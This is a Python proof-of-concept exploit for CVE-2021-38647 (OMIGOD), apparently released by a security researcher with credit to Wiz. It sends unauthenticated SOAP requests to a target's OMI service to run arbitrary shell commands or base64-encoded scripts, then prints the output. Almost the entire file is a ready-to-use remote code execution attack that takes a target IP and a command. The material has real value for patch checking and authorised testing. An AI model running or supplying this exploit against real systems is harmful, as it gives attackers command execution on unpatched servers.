#!/usr/bin/env python
#
# Author: Chirag Savla (@chiragsavla94) of Altered Security Pte Ltd.
#
# Credit: WIZ Team (@wiz_io)
#
# Blog: https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
import requests
import xml.etree.ElementTree as ET
import warnings
import argparse
import html
warnings.filterwarnings("ignore")
Body = """
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" >
<s:Header>
<a:To>HTTP://127.0.0.1:5986/wsman/</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
<a:MessageID>uuid:6B72D22C-CC07-0005-0000-000000010000</a:MessageID>
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
<w:OptionSet s:mustUnderstand="true"></w:OptionSet>
<w:SelectorSet>
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
</w:SelectorSet>
</s:Header>
<s:Body>
<p:ExecuteShellCommand_INPUT
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>{cmd}</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
"""
ScriptBody = """
<s:Envelope
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" >
<s:Header>
<a:To>HTTP://127.0.0.1:5986/wsman/</a:To>
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
<a:ReplyTo>
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
</a:ReplyTo>
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
<a:MessageID>uuid:DFAB024A-CC2A-0005-0000-000000010000</a:MessageID>
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
<w:OptionSet s:mustUnderstand="true"></w:OptionSet>
<w:SelectorSet>
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
</w:SelectorSet>
</s:Header>
<s:Body>
<p:ExecuteScript_INPUT
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:Script>{script}</p:Script>
<p:Arguments></p:Arguments>
<p:timeout>0</p:timeout>
<p:b64encoded>true</p:b64encoded>
</p:ExecuteScript_INPUT>
</s:Body>
</s:Envelope>
"""
def exploit(TargetIP,TargetPort,Command,Script):
url = "https://"+TargetIP+":"+TargetPort+"/wsman"
headers = {'Content-Type': 'application/soap+xml;charset=UTF-8'}
response = None
if(Command):
response = requests.post(url, headers=headers, data = Body.format(cmd=Command), verify=False)
elif(Script):
response = requests.post(url, headers=headers, data = ScriptBody.format(script=Script), verify=False)
else:
print("Please pass -c or -s argument.")
if(response !=None):
tree = ET.ElementTree(ET.fromstring(response.content))
root = tree.getroot()
if(root[1][0][1].text == "0"):
print(root[1][0][2].text)
else:
print(root[1][0][3].text)
def main():
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-38647 - POC to exploit unauthenticated RCE #OMIGOD")
parser.add_argument('-t', '--TargetIP', default='', help='Enter IP Address of the target machine.', required=True)
parser.add_argument('-p', '--TargetPort', default='5986', help='Enter Target Port number on which the OMI service is running.', required=False)
parser.add_argument('-c', '--Command', default='', help='Enter the command that needs to be executed on the target machine.', required=False)
parser.add_argument('-s', '--Script', default='', help='Enter the command that needs to be executed on the target machine.', required=False)
options = parser.parse_args()
exploit(TargetIP=options.TargetIP, TargetPort=options.TargetPort, Command = html.escape(options.Command), Script = options.Script )
if __name__ == '__main__':
main()
